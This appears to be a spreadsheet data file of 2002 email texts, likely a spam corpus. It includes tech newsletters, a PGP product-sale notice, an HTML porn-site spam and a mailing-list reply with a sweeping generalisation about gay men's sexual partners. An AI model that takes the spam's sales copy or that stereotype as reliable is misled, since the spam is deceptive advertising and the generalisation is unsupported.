 &lt;P style="TEXT-ALIGN: center" align=center&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;Copyright (c) 2000, 2001, 2002 &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 13.5pt; FONT-FAMILY: Stop"&gt;CPI, LLC&lt;/SPAN&gt;&lt;SPAN style="FONT-FAMILY: Arial"&gt;. All rights reserved.&lt;BR&gt;&lt;B&gt;Disclaimers and limitations of liabilities posted at &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/IndustryForum.htm" target=_blank&gt;cpillc.com&lt;/A&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;B&gt;&lt;BR&gt;&lt;/B&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;This free &lt;SPAN style="COLOR: red"&gt;e&lt;/SPAN&gt;Service is made possible by &lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Stop"&gt;CPI&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;.&lt;BR&gt;&amp;nbsp;Please visit their web site at &lt;A style="COLOR: blue; TEXT-DECORATION: underline" href="http://www.cpillc.com/" target=_blank&gt;&lt;SPAN style="TEXT-DECORATION: none"&gt;www.cpillc.com&lt;/SPAN&gt;&lt;/A&gt; or call toll-free 877-274-2600 or 805-552-9128.&lt;BR&gt;&lt;/SPAN&gt;&lt;SPAN style="FONT-SIZE: 7.5pt; FONT-FAMILY: Arial"&gt;If you wish to unsubscribe, please hit the reply button - Subject = Remove. Please allow 3 days to take effect.&lt;/SPAN&gt;&lt;/P&gt;&lt;/DIV&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&amp;nbsp;&lt;/P&gt;
 ------=_NextPart_QXVROEFEFX--
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 8 Sep 2002, Gordon Mohr wrote:
 &gt; OK, then. Consider a population of 1,000,000. 500,000 men each
 &gt; pair off with 500,000 women. Then, 1 man, let's call him "Wilt",
 &gt; also has sex with the other 499,999 women. 
 It is not uncommon to find gay males who had sex with several thousands
 partners (there would be more, in fact lots more, probably, but a lot of
 them have died). Don't have to be a callboy, if considering that you can
 have intercourse with several partners in a single day in a bathouse it
 doesn't look particularly difficult to do.
 Clearly this is not something what hets do, prostitution not taken into
 account.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-08-07
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * Underground Movies of My Talks?
 +--------------------------------------------------------------------+
 | Underground Movies of My Talks?                                    |
 |   posted by pudge on Tuesday August 06, @06:23 (others)            |
 |   http://use.perl.org/article.pl?sid=02/08/05/1323232              |
 +--------------------------------------------------------------------+
 [0]Dominus writes "At my talks at TPC this year I noticed people in the
 audience with video recorders. That's fine with me, but now I want to see
 the recordings! I saw at least two people recording 'Mailing List Judo'
 and 'Conference Presentation Judo.' If you do have a video, please drop
 me a note. Thanks." I wouldn't mind an audio or video recording of my
 YAPC talk either, if someone had such a beast.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/08/05/1323232
 Links:
     0. mailto:mjd@plover.com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</si>
  <si>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watch over 290 GB full length movies here           QIIH
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Watch full length movies in full screen complete we collection! &lt;/t=
 itle&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html;"&gt;
 &lt;!-- Fireworks 4.0  Dreamweaver 4.0 target.  Created Fri Dec 21 11:16:30 G=
 MT+0800 (?D1=FFFFFFA8=FFFFFFB2=FFFFFFA1=FFFFFFC0=FFFFFFA8=FFFFFFBA=FFFFFFA=
 1=FFFFFFC1?=FFFFFFA8=FFFFFFBA=FFFFFFA1=FFFFFFC0??) 2001--&gt;
 &lt;script language=3D"JavaScript"&gt;
 &lt;!--
 function MM_reloadPage(init) {  //reloads the window if Nav4 resized
   if (init=3D=3Dtrue) with (navigator) {if ((appName=3D=3D"Netscape")&amp;&amp;(pa=
 rseInt(appVersion)=3D=3D4)) {
     document.MM_pgW=3DinnerWidth; document.MM_pgH=3DinnerHeight; onresize=3D=
 MM_reloadPage; }}
   else if (innerWidth!=3Ddocument.MM_pgW || innerHeight!=3Ddocument.MM_pgH=
 ) location.reload();
 }
 MM_reloadPage(true);
 // --&gt;
 &lt;/script&gt;
 &lt;SCRIPT LANGUAGE=3D"JavaScript"&gt; 
 &lt;!-- 
 var flasher =3D false 
 // calculate current time, determine flasher state, 
 // and insert time into status bar every second 
 function updateTime() { 
 var now =3D new Date() 
 var theHour =3D now.getHours() 
 var theMin =3D now.getMinutes() 
 var theTime =3D "" + ((theHour &gt; 12) ? theHour - 12 : theHour) 
 theTime +=3D ((theMin &lt; 10) ? ":0" : ":") + theMin 
 theTime +=3D ((flasher) ? "  " : " =3D") 
 theTime +=3D (theHour &gt;=3D 12) ? " AM" : " PM" 
 flasher =3D !flasher 
 window.status =3D theTime 
 // recursively call this function every second to keep timer going 
 timerID =3D setTimeout("updateTime()",0) 
 } 
 //--&gt; 
 &lt;/SCRIPT&gt; 
 &lt;/head&gt;
 &lt;body bgcolor=3D"#0099ff" link=3D"#FFFFFF" vlink=3D"#FFFFFF" alink=3D"#FFF=
 FFF" topmargin=3D"0" onLoad=3D"updateTime()"&gt;
 &lt;table width=3D"88%" border=3D"0" height=3D"660" align=3D"center"&gt;
   &lt;tr&gt; 
     &lt;td height=3D"67"&gt; 
       &lt;div align=3D"center"&gt;&lt;font color=3D"#FFFFFF" face=3D"Georgia, Times=
  New Roman, Times, serif" size=3D"3"&gt;&lt;b&gt;Watch 
         full length movies in full screen complete we collection! avi, mpe=
 g, wmv, 
         real collection. NOW! Our site have more than 290GB movies ,and we=
  update 
         600MB movies everyday.Join us now!! Watch the fresh and top-qualit=
 y movies 
         everyday.&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td height=3D"478"&gt; 
       &lt;div align=3D"center"&gt; 
         &lt;table bgcolor=3D"#0099ff" border=3D"0" cellpadding=3D"0" cellspac=
 ing=3D"0" width=3D"667"&gt;
           &lt;!-- fwtable fwsrc=3D"movies2.png" fwbase=3D"main.jpg" fwstyle=3D=
 "Dreamweaver" fwdocid =3D "742308039" fwnested=3D"0" --&gt;
           &lt;tr&gt; 
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"177" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"39" height=3D"1" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"36" height=3D"1" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"124" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"130" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"143" height=3D"1" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"18" height=3D"1" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"1" bo=
 rder=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td colspan=3D"2"&gt;&lt;img name=3D"main_r1_c1" src=3D"http://space=
 towns.com/kevintse932/images/main_r1_c1.jpg" width=3D"216" height=3D"22" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td colspan=3D"5"&gt;&lt;img name=3D"main_r1_c3" src=3D"http://space=
 towns.com/kevintse932/images/main_r1_c3.jpg" width=3D"451" height=3D"22" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"22" b=
 order=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td rowspan=3D"2" colspan=3D"2"&gt;&lt;img name=3D"main_r2_c1" src=3D=
 "http://spacetowns.com/kevintse932/images/main_r2_c1.jpg" width=3D"216" he=
 ight=3D"119" border=3D"0"&gt;&lt;/td&gt;
             &lt;td colspan=3D"5"&gt;&lt;img src=3D"http://spacetowns.com/kevintse93=
 2/images/ban12.gif" width=3D"451" height=3D"39"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"39" b=
 order=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td rowspan=3D"3" colspan=3D"2"&gt;&lt;img name=3D"main_r3_c3" src=3D=
 "http://spacetowns.com/kevintse932/images/main_r3_c3.jpg" width=3D"160" he=
 ight=3D"351" border=3D"0"&gt;&lt;/td&gt;
             &lt;td rowspan=3D"3"&gt;&lt;img name=3D"main_r3_c5" src=3D"http://space=
 towns.com/kevintse932/images/main_r3_c5.jpg" width=3D"130" height=3D"351" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td rowspan=3D"3" colspan=3D"2"&gt;&lt;img name=3D"main_r3_c6" src=3D=
 "http://spacetowns.com/kevintse932/images/main_r3_c6.jpg" width=3D"161" he=
 ight=3D"351" border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"80" b=
 order=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td colspan=3D"2"&gt;&lt;img name=3D"main_r4_c1" src=3D"http://space=
 towns.com/kevintse932/images/main_r4_c1.jpg" width=3D"216" height=3D"128" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"128" =
 border=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td rowspan=3D"3"&gt;&lt;img name=3D"main_r5_c1" src=3D"http://space=
 towns.com/kevintse932/images/main_r5_c1.jpg" width=3D"177" height=3D"198" =
 border=3D"0"&gt;&lt;/td&gt;
             &lt;td rowspan=3D"3"&gt;&lt;img name=3D"main_r5_c2" src=3D"http://space=
 towns.com/kevintse932/images/main_r5_c2.jpg" width=3D"39" height=3D"198" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"143" =
 border=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td rowspan=3D"2"&gt;&lt;img name=3D"main_r6_c3" src=3D"http://space=
 towns.com/kevintse932/images/main_r6_c3.jpg" width=3D"36" height=3D"55" bo=
 rder=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;a href=3D"https://secure.pswbilling.com/cgi-bin/form.cgi?=
 AccountID=3D200324&amp;ProductCode=3DxxxmovT4R&amp;Template=3Dblock&amp;bgcolor=3D0000=
 00&amp;text=3Dffffff&amp;thtext=3Dffffff&amp;link=3Dffffff&amp;tb=3Dffffff&amp;th=3D333333&amp;td=3D=
 000000"&gt;&lt;img name=3D"main_r6_c4" src=3D"http://spacetowns.com/kevintse932/=
 images/main_r6_c4.jpg" width=3D"124" height=3D"19" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
             &lt;td rowspan=3D"2"&gt;&lt;a href=3D"https://secure.pswbilling.com/cgi=
 -bin/form.cgi?AccountID=3D200324&amp;ProductCode=3DxxxmovT4R&amp;Template=3Dblock&amp;=
 bgcolor=3D000000&amp;text=3Dffffff&amp;thtext=3Dffffff&amp;link=3Dffffff&amp;tb=3Dffffff&amp;t=
 h=3D333333&amp;td=3D000000"&gt;&lt;img src=3D"http://spacetowns.com/kevintse932/imag=
 es/ban13.gif" width=3D"130" height=3D"55" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
             &lt;td&gt;&lt;a href=3D"https://secure.pswbilling.com/cgi-bin/form.cgi?=
 AccountID=3D200324&amp;ProductCode=3DxxxmovT4R&amp;Template=3Dblock&amp;bgcolor=3D0000=
 00&amp;text=3Dffffff&amp;thtext=3Dffffff&amp;link=3Dffffff&amp;tb=3Dffffff&amp;th=3D333333&amp;td=3D=
 000000"&gt;&lt;img name=3D"main_r6_c6" src=3D"http://spacetowns.com/kevintse932/=
 images/main_r6_c6.jpg" width=3D"143" height=3D"19" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img name=3D"main_r6_c7" src=3D"http://spacetowns.com/kevi=
 ntse932/images/main_r6_c7.jpg" width=3D"18" height=3D"19" border=3D"0"&gt;&lt;/t=
 d&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"1" height=3D"19" b=
 order=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt; 
             &lt;td&gt;&lt;img name=3D"main_r7_c4" src=3D"http://spacetowns.com/kevi=
 ntse932/images/main_r7_c4.jpg" width=3D"124" height=3D"36" border=3D"0"&gt;&lt;/=
 td&gt;
             &lt;td colspan=3D"2"&gt;&lt;img name=3D"main_r7_c6" src=3D"http://space=
 towns.com/kevintse932/images/main_r7_c6.jpg" width=3D"161" height=3D"36" b=
 order=3D"0"&gt;&lt;/td&gt;
             &lt;td&gt;&lt;img src=3D"images/spacer.gif" width=3D"8" height=3D"36" b=
 order=3D"0"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/div&gt;
       &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td height=3D"2"&gt; 
       &lt;div align=3D"center"&gt;&lt;font face=3D"Times New Roman, Times, serif"&gt;&lt;=
 b&gt;&lt;font color=3D"#FFFFFF" size=3D"6"&gt;&lt;a href=3D"https://secure.pswbilling.=
 com/cgi-bin/form.cgi?AccountID=3D200324&amp;ProductCode=3DxxxmovT4R&amp;Template=3D=
 block&amp;bgcolor=3D000000&amp;text=3Dffffff&amp;thtext=3Dffffff&amp;link=3Dffffff&amp;tb=3Dff=
 ffff&amp;th=3D333333&amp;td=3D000000"&gt;JOIN 
         NOW&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td height=3D"87"&gt;
       &lt;div align=3D"center"&gt;&lt;font color=3D"#333333"&gt;We also appreciate you=
 r business, 
         but if you don't &lt;br&gt;
         wish to have anymore emails sent to you or this email reached you =
 by mistake, 
         &lt;br&gt;
         then click here. This message was sent you by PornOfficeBox.com, 4=
 884 
         Laurel &lt;br&gt;
         Canyon, #118 , Valley Village, CA 91607 ph:818-908-1068&lt;/font&gt;&lt;/di=
 v&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PGP Corp. Purchases PGP Desktop Encryption and Wireless Product Lines from NET
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 To: rah@ibuc.com
 From: "Network Associates" &lt;nai@nai.rsc01.com&gt;
 Date: Mon, 19 Aug 2002 05:34:11 -0700
 Reply-To: "Network Associates" &lt;corporatemarketing@nai.com&gt;
 Subject: PGP Corp. Purchases PGP Desktop Encryption and Wireless Product
 Lines from NET
 August 19, 2002
 Dear Customer,
 Today we are pleased to announce that PGP Corporation, a newly formed,
 venture-funded security company, has acquired the PGP desktop encryption
 and wireless product lines from Network Associates.  As you know, prior to
 placing the products into maintenance mode, we were actively looking for a
 buyer that would continue the development and support of the technology.
 Network Associates has retained products developed using PGPsdk including
 McAfee E-Business Server for encrypted server-to-server file transfer,
 McAfee Desktop Firewall and McAfee VPN Client. These products will remain a
 part of Network Associates existing product portfolio and we will continue
 to develop them to meet your security needs. PGP Corporation has acquired
 PGPmail, PGPfile, PGPdisk, PGPwireless, PGPadmin and PGPkeyserver
 encryption software products for Win32 and Macintosh, PGPsdk encryption
 software development kit, and PGP Corporate Desktop for Macintosh.
 In addition to the technology, PGP Corporation has acquired all worldwide
 customer license agreements and technical support obligations. To ensure a
 seamless transition, Network Associates will work with PGP Corporation to
 support PGP customers through October 26, 2002. PGP Corporation will
 contact you shortly with details on its plans and product direction.
 We trust that you will have continued success with the PGP desktop and
 wireless encryption products through PGP Corporation. Network Associates
 appreciates your business and we value our continued relationship across
 our remaining product lines.
 Best Regards,
 Sandra England
 Executive Vice President, Business Development and Strategic Research
 Network Associates
 ****************************************************************************************************
 You have received this message because you are a subscriber to the Network
 Associates Web sites. To unsubscribe, please follow the instructions at the
 end of this message.
 This information update is available at no charge to all registered users
 of Network Associates Web site.
 * To change your email address, send a reply to this email address and to
 subscribe@nai.com with the words, "change-address" in the subject line. In
 the body of the message include your old and new email addresses with the
 original message. Use the following format for email changes:
 OLD: enduser@olddomain.com
 NEW: Joseph_User@newdomain.com
 ______________________________________________________________________
 This message was sent by Network Associates, Inc. using Responsys Interact
 (TM).
 If you prefer not to receive future e-mail from Network Associates, Inc.:
     http://nai.rsc01.net/servlet/optout?gHpgJDWWBEkHoFpINJDJhtE0
 To view our permission marketing policy:
     http://www.rsvp0.net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</si>
  <si>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Subject: Cyberspace in the 21st Century: Part Seven, Security is Relative
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613673,159/
 Date: 2002-10-06T18:12:47+01:00
 Security in cyberspace is a different kettle of fish compared to many computer 
 systems. Cyberspace entertainment only has to be useful to the majority of its 
 users --entertaining. That means it can tolerate a small amount of vandalism 
 still remain useful. This is quite unlike a system required for commerce. We 
 still have a headache of course, but at least we only need to keep the system 
 around 90 percent clean, rather than 99.99 percent. Of course well still 
 strive to stamp out corruption, but our system failure threshold is more 
 achievable than one might at first assume.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;!--
       CLICK HERE to read this newsletter on the Web for FREE:
       &lt;a href="http://www.lockergnome.com/issues/penguinshell/20020716.html"&gt;
       http://www.lockergnome.com/issues/penguinshell/20020716.html
       &lt;/a&gt;
       Don't worry about anything else below this paragraph.
       It's for those with HTML e-mail clients. Just go to
       the above listed web address to view this issue
       perfectly in your web browser. Thanks again! --&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
  body      { BACKGROUND-IMAGE: url(http://www.lockergnome.com/images/issue/top-right.gif); scrollbar-3dlight-color: #DADADA; scrollbar-arrow-color: #17514B; scrollbar-base-color: #007C7A; scrollbar-darkshadow-color: #808080; scrollbar-face-color: #C0C0C0; scrollbar-highlight-color: #DADADA; scrollbar-shadow-color: #808080 }
  a:link    { COLOR: RED; TEXT-DECORATION: underline }
  a:visited { COLOR: #FF8080; TEXT-DECORATION: underline }
  a:active  { color: #000000; TEXT-DECORATION: none }
  a:hover   { color: #820000; TEXT-DECORATION: none }
  p.title   { BACKGROUND: #C0C0C0; BORDER-BOTTOM: #808080 4px solid; BORDER-LEFT: #DADADA 4px solid; BORDER-RIGHT: #808080 4px solid; BORDER-TOP: #DADADA 4px solid; COLOR: #000000; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 14pt; FONT-WEIGHT: normal }
  p.news    { BACKGROUND: #C0C0C0; BORDER-BOTTOM: #808080 4px solid; BORDER-LEFT: #DADADA 4px solid; BORDER-RIGHT: #808080 4px solid; BORDER-TOP: #DADADA 4px solid; COLOR: #000000; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 18pt; FONT-WEIGHT: normal }
  p.sidebar { BACKGROUND: #DADADA; BORDER-BOTTOM: #C0C0C0 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #C0C0C0 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #000000; FONT-FAMILY: Comic Sans MS, Trebuchet MS, Helvetica, Arial; FONT-SIZE: 10pt; FONT-WEIGHT: bold; TEXT-ALIGN: center }
  .link     { BACKGROUND: #DADADA; BORDER-BOTTOM: #C0C0C0 3px solid; BORDER-LEFT: #FFFFFF 3px solid; BORDER-RIGHT: #C0C0C0 3px solid; BORDER-TOP: #FFFFFF 3px solid; COLOR: #808080; font-size: 9pt; font-family: Verdana; font-weight: bold; padding: 3px; width: 100% }
  .url      { font-size: 8pt; font-family: Verdana, Tahoma, Arial }
  .fixed    { font-family: courier, courier new; font-size: 10px }
 --&gt;
 &lt;/style&gt;&lt;title&gt;20020716 Lockergnome Penguin Shell&lt;/title&gt;&lt;/head&gt;
 &lt;body   MARGINHEIGHT="0" TOPMARGIN="0" BOTTOMMARGIN="0" bgcolor="#FFFFFF"   style="BACKGROUND-POSITION: right top; 
 BACKGROUND-REPEAT: no-repeat" MARGINWIDTH="0" LEFTMARGIN="0" rightmargin="0" text="#000000" alink="#008080" link="RED" 
 vlink="RED"&gt;
 &lt;!-- background="http://images.lockergnome.com/images/bg.head.gray.gif" bgcolor="#C0C0C0" left width="610" 
 background="http://images.lockergnome.com/images/sp.back.top-r1.gif" --&gt;
  &lt;table width="100%" border="0" cellspacing="0" cellpadding="7" align="CENTER" valign="MIDDLE"&gt;
   &lt;tr&gt;&lt;td background="http://www.lockergnome.com/images/issue/top-left.gif"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href="http://www.qksrv.net/click-471546-487847"&gt;
 &lt;img src="http://www.qksrv.net/image-471546-487847" width="468" height="60" alt="Linux Central" border="0"&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;/center&gt;
  &lt;!-- TOP BANNER AD --&gt;
  &lt;!--#include virtual="/include/banner.txt" --&gt;
  &lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td valign="top" bgcolor="#FFFFFF"&gt;&lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;!-- NEWS --&gt;
 &lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="news"&gt;
 &amp;nbsp; 07.16.2002 PenguinREPORT&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:&lt;/b&gt; We've teamed up with
 Dice.com to bring you a full service I.T. career enhancement solution.
 Whether you are looking for your
 &lt;a href="http://seeker.dice.com/jobsearch/jobsearch.epl?rel_code=14"&gt;dream job&lt;/a&gt;
 or trying to
 &lt;a href="http://seeker.dice.com/jobsearch/jobsearch.epl?rel_code=14"&gt;hire talented people&lt;/a&gt;,
 the full-featured career resource center is the place to start. Find your
 &lt;a href="http://seeker.dice.com/jobsearch/jobsearch.epl?rel_code=14"&gt;IT talent solution&lt;/a&gt;
 today!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 I've got a few quick Lockergnome-related notes for you today.&lt;p&gt;
 First, we'd really like to see you in August. I know that Jake, Chris and Randy have been signing off on their newsletters with those few words, and I'll join them. If you didn't experience &lt;a href="http://www.gnomedex.com/" target="_blank"&gt;Gnomedex&lt;/a&gt; last year, you missed, in the words of many industry insiders, "The show of the year." It was unlike any other computer conference I've ever attended. Unlike any conference I've attended, period, computer-related or not. While most such conferences are a huge hustle and hassle, Gnomedex was what computing and Lockergnome are all about - sharing useful information, gathering with like-minded enthusiasts, and learning to use your chosen computer to the fullest extent. No hustle. No hassle. No BS. For the minimal cost of &lt;a href="http://gnomedex.com/registration.php" target="_blank"&gt;registration&lt;/a&gt;, it would be hard to find a better weekend for geeks and wannabes alike. Add to that the schedule of luminaries presenting and attending and you've got the best deal on the planet for computer users. It's hard to believe we're less than a month away - I really do hope to see you there.&lt;p&gt;
 Another Lockergnome innovation has hit the newsstands - err, bookstores. That's right. &lt;a href="http://applecore.lockergnome.com/" target="_blank"&gt;Jake&lt;/a&gt; has release a &lt;b&gt;FREE&lt;/b&gt; &lt;a href="http://www.gnometomes.com/" target="_blank"&gt;GnomeTome&lt;/a&gt; on "Converting Vinyl LPs to CD." Who'd have thought there were so many of you out there that are, well, my age and still in possession of those black slabs of aural heaven. I don't know if Jake's just lost his mind, or what, but free? Get outta here. Go ahead - "Gnome" our servers. Get you copy while you can. And while you're there, check out some of the other killer e-tip books in the GnomeTomes collection.&lt;p&gt;
 Have a great Tuesday.&lt;p&gt;&lt;p&gt;
 &lt;p align="right"&gt;&lt;font style="font-size: 23pt" face="Tony Steidler-Dennison" size="5"&gt;Tony
 Steidler-Dennison&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/P&gt;
 &lt;!-- TWEAK --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p 
 class="title"&gt;&amp;nbsp;GnomeTWEAK&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;p class="sidebar"&gt;&lt;table cellpadding="10" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 10pt" face="Verdana, Tahoma, Arial" size="2"&gt;
 &lt;b&gt;Lockergnome readers, SAVE 50% on the Computing Encyclopedia!&lt;/b&gt;
 Are you looking for the ultimate computing resource? Discover the
 &lt;i&gt;Computing Encyclopedia&lt;/i&gt; from Smart Computing.  Regular price $59,
 SPECIAL OFFER for Lockergnome readers,
 &lt;a href="http://www.smartcomputing.com/offer/encyclopediaset.asp?source=2000"&gt;get your set TODAY&lt;/a&gt;, ONLY $29.95!
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/p&gt;
 &lt;b&gt;Setting the Home Page in Konqueror&lt;/b&gt;&lt;p&gt;
 Konqueror, while a great browser, has taken a step in the direction of IE. Like IE, Konqueror is really an integrated web &lt;i&gt;and&lt;/i&gt; file browser. You can use it equally well to view web pages and files on your system. It's been something of a hot debate whether this is actually the proper use of a browser. In fact, Galeon was written specifically to answer this question - it's a web browser and a web broswer only.&lt;p&gt;
 Regardless, it can be a bit annoying to punch the Home button on the Konqueror browser and end up in your /home/&lt;i&gt;user&lt;/i&gt; directory. Have no fear, though. It's an easy change to make your actual web home page the home page in Konqueror.&lt;p&gt;
 Open Konqueror and select Settings from the toolbar. Select "Configure Konqueror," and leave the default selection of "File Manager" as is. In the text box on the right half of the screen, you'll see a tilde in the "Home URL" text box. That just tells Konqueror to use the user's home directory as the home URL. Changing this to a web address will set that address as your home page. Select OK to close the window.&lt;p&gt;
 Taking it one step further, click on the Home button in your Konqueror browser to open your newly-configured web home page. Then, select "Window" and "Save View Profile, 'Web Browsing.'" This will futher save the URL and allow your the opportunity to save the window size when the browser opens.&lt;p&gt;
 Konqueror is more than just a web browser. But, it's not so tough to make it act like a pure web browser if you just know where to look.&lt;p&gt;&lt;p&gt;
 &lt;p align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" 
 href="http://www.lockergnome.com/recommend.html"&gt;Recommend It!&lt;/a&gt;&lt;br&gt;
 &lt;span align="right"&gt;&lt;a class="url" style="color: gray; text-decoration: none" href="mailto:tony@lockergnome.com?subject=GnomeCORE"&gt;Send us a GnomeTWEAK&lt;/a&gt;&lt;/span&gt;
 &lt;!-- CORE --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#C0C0C0" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p 
 class="title"&gt;&amp;nbsp;GnomeCORE&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;b&gt;Kernel Configuration - Part XII&lt;/b&gt;&lt;p&gt;
 Depending on who you talk to, RAID can stand for "Redundant Array of Independent Discs" or "Redundant Array of Inexpensive Discs." No matter. They both point to the same theory and practice in Linux; data storage redundancy. That's today's kernel configuration section - Multi-Device Support.&lt;p&gt;
 Let's talk first about the principles behind a RAID setup. RAID uses multiple discs for speed, increased data storage, or data redundancy. Fundamentally, there are 5 levels of RAID in Linux; Linear, RAID-0, RAID-1, RAID-4, and RAID-5.&lt;p&gt;
 Linear RAID uses two or more discs, appending data from one to another. In other words, when disc 1 is full, disc 2 steps in to store data. There is no redundancy in Linear RAID - only an increase in storage capacity. Further, there's no marked increase in data access speed because you're accessing one drive in the RAID array at a time.&lt;p&gt;
 RAID-0 "stripes" data across the RAID drives. Some data will be written to the first drive, some to the second, etc. Like Linear RAID, RAID-0 provides no redundancy. Because the data has been written in parallel across the drives, not all data exists on all drives. Lose a drive and your data is gone. RAID-0 will, however, decrease data access time. Your system will run more quickly.&lt;p&gt;
